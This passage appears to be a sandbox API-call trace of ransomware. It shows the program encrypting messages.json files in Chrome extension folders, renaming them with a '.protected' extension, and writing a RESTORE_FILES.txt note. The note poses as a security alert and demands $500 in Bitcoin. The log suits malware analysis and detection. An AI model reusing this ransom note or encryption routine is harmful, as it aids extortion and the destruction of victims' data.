-1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="Program Files (x86)") returned -1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="$Recycle.bin") returned 1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="System Volume Information") returned -1 [0080.595] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml") returned 141 [0080.595] lstrcmpW (lpString1="ml", lpString2=".") returned 1 [0080.595] lstrcmpW (lpString1="ml", lpString2="..") returned 1 [0080.595] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\*") returned 143 [0080.595] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0080.596] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.596] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.596] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.596] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.596] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.596] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\.") returned 143 [0080.596] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.596] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.596] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.596] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.596] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.596] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.596] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.596] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\..") returned 144 [0080.596] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.596] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.596] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.596] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.596] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.596] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.596] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.596] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.596] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json") returned 155 [0080.596] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.596] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.596] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.596] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json") returned 155 [0080.598] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json") returned 155 [0080.599] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.599] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json") returned 155 [0080.599] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.599] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x183, lpOverlapped=0x0) returned 1 [0080.600] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.600] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x183, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x183, lpOverlapped=0x0) returned 1 [0080.600] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.600] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.600] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.601] CloseHandle (hObject=0x168) returned 1 [0080.601] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.protected") returned 165 [0080.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.protected")) returned 1 [0080.601] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.602] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.602] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\RESTORE_FILES.txt") returned 159 [0080.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.602] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.602] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.603] lstrlenA (lpString="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") returned 684 [0080.603] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.603] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.603] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.603] CloseHandle (hObject=0x164) returned 1 [0080.603] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="Windows") returned -1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="Program Files") returned -1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="Program Files (x86)") returned -1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="$Recycle.bin") returned 1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="System Volume Information") returned -1 [0080.603] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn") returned 141 [0080.603] lstrcmpW (lpString1="mn", lpString2=".") returned 1 [0080.603] lstrcmpW (lpString1="mn", lpString2="..") returned 1 [0080.603] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\*") returned 143 [0080.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.604] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.604] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.604] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.604] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.604] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.604] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\.") returned 143 [0080.604] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.604] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.604] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.604] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.604] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.604] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.604] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.604] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\..") returned 144 [0080.604] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.604] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.604] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.604] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json") returned 155 [0080.604] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.604] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.604] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.605] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.605] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json") returned 155 [0080.605] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.605] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json") returned 155 [0080.605] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.605] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json") returned 155 [0080.605] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.605] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x1c3, lpOverlapped=0x0) returned 1 [0080.606] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.606] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x1c3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x1c3, lpOverlapped=0x0) returned 1 [0080.606] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.607] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.607] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.607] CloseHandle (hObject=0x168) returned 1 [0080.607] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.protected") returned 165 [0080.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.protected")) returned 1 [0080.608] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.608] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.608] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\RESTORE_FILES.txt") returned 159 [0080.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.608] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.608] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.609] lstrlenA (lpString="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") returned 684 [0080.609] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.609] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.609] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.609] CloseHandle (hObject=0x164) returned 1 [0080.609] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.609] lstrcmpiW (lpString1="mr", lpString2="Windows") returned -1 [0080.609] lstrcmpiW (lpString1="mr", lpString2="Program Files") returned -1 [0080.609] lstrcmpiW (lpString1="mr", lpString2="Program Files (x86)") returned -1 [0080.610] lstrcmpiW (lpString1="mr", lpString2="$Recycle.bin") returned 1 [0080.610] lstrcmpiW (lpString1="mr", lpString2="System Volume Information") returned -1 [0080.610] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr") returned 141 [0080.610] lstrcmpW (lpString1="mr", lpString2=".") returned 1 [0080.610] lstrcmpW (lpString1="mr", lpString2="..") returned 1 [0080.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\*") returned 143 [0080.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.610] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.610] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.610] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.610] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.610] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\.") returned 143 [0080.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.610] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.610] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.610] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 